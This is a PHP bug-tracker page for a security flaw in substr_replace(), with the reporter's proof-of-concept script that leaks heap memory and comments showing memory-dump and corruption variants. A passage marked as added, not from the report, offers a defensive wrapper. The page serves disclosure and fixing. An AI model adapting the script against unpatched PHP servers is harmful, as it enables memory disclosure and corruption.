Sec Bug #55871 Interruption in substr_replace()
Submitted: 2011-10-08 09:38 UTC Modified: 2015-04-26 12:52 UTC
From: worawita at gmail dot com Assigned: stas (profile)
Status: Closed Package: Strings related
PHP Version: 5.3 OS: *
Private report: No CVE-ID: None
 [2011-10-08 09:38 UTC] worawita at gmail dot com
Description:
------------
The substr_replace() function can be interrupted and used for information leakage, memory corruption or use-after-free (>= 5.3.7) due to pass-by-reference in an array.
The test script below causes a "Segmentation Fault" in PHP with the Suhosin patch.

Test script:
---------------
<?php

class dummy {
	public function __toString() {
		//$GLOBALS['my_var'] += 0x08048000; // dump memory at 0x08048000
		//$GLOBALS['my_var'] .= 'AAAAAAAA'; // memory corruption
		preg_match('//', '', $GLOBALS['my_var']); // dump HashTable data (and use-after-free in >=5.3.7)
		return '';
	}
}

$my_var = str_repeat('A', 40);
$out = substr_replace(array(&$my_var), array(new dummy), 40, 0);
var_dump($out);

Expected result:
----------------
array(1) {
  [0]=>
  string(40) "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}

Actual result:
--------------
array(1) {
  [0]=>
  string(40)       ☺   ☺ ≥ò≥ò≥ò☻└±ò☻@δKk  ☺t"
}
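The interruption happens because the engine converts the replacement array's elements to strings while it already holds pointers into the by-reference string. A defensive wrapper, added here as an example and not part of the bug report or of php-src, forces every string conversion to happen before substr_replace() is called, so any __toString() runs outside the engine's loop. The names safe_substr_replace and Hostile are assumptions; this is a mitigation for unpatched builds, not a replacement for the fix.

```php
<?php
// Added example (not from the bug report): defensive wrapper for PHP builds
// without the fix for bug #55871. All string conversions are performed here,
// before substr_replace() runs, so no __toString() callback can fire while the
// engine is holding pointers into a by-reference string.
function safe_substr_replace($string, $replacement, $start, $length = null)
{
    // Materialise arrays into fresh, plain-string copies. The (string) cast
    // invokes __toString() now, outside substr_replace(), and assigning into
    // $copy stores values rather than references, so a callback that mutates
    // the caller's variable cannot touch the buffer that is later spliced.
    $materialise = function ($value) {
        if (is_array($value)) {
            $copy = array();
            foreach ($value as $k => $v) {
                $copy[$k] = (string) $v;
            }
            return $copy;
        }
        return (string) $value;
    };

    $string      = $materialise($string);   // copies taken before any callback
    $replacement = $materialise($replacement); // callbacks run here, on copies

    if ($length === null) {
        return substr_replace($string, $replacement, $start);
    }
    return substr_replace($string, $replacement, $start, $length);
}

// Constructed demo mirroring the report: a replacement object whose
// __toString() writes to the by-reference argument.
class Hostile
{
    public function __toString()
    {
        $GLOBALS['my_var'] .= 'AAAAAAAA'; // mutates the referenced string
        return '';
    }
}

$my_var = str_repeat('A', 40);
$out = safe_substr_replace(array(&$my_var), array(new Hostile), 40, 0);
// The spliced value is the 40-byte copy taken before the callback ran.
var_dump($out[0] === str_repeat('A', 40)); // bool(true)
```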

 [2012-01-02 00:47 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2012-01-02 00:47 UTC] stas@php.net
This bug has been fixed in SVN.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2012-01-09 13:30 UTC] worawita at gmail dot com
Still not fixed in the 5.3 branch.
 [2012-03-13 07:26 UTC] stas@php.net
-Status: Closed +Status: Re-Opened -PHP Version: Irrelevant +PHP Version: 5.3
 [2012-04-18 09:46 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e2a2ed348f6a238c1e43eb01e2e0aa5a70b217c2
Log: fix bug #55871 - Interruption in substr_replace()
 [2012-05-13 15:13 UTC] felipe@php.net
-Status: Re-Opened +Status: Assigned -Private report: No +Private report: Yes
 [2012-07-04 11:37 UTC] felipe@php.net
-Status: Assigned +Status: Closed
 [2012-07-04 11:37 UTC] felipe@php.net
This bug has been fixed in SVN.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Closing.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 09:01:32 2024 UTC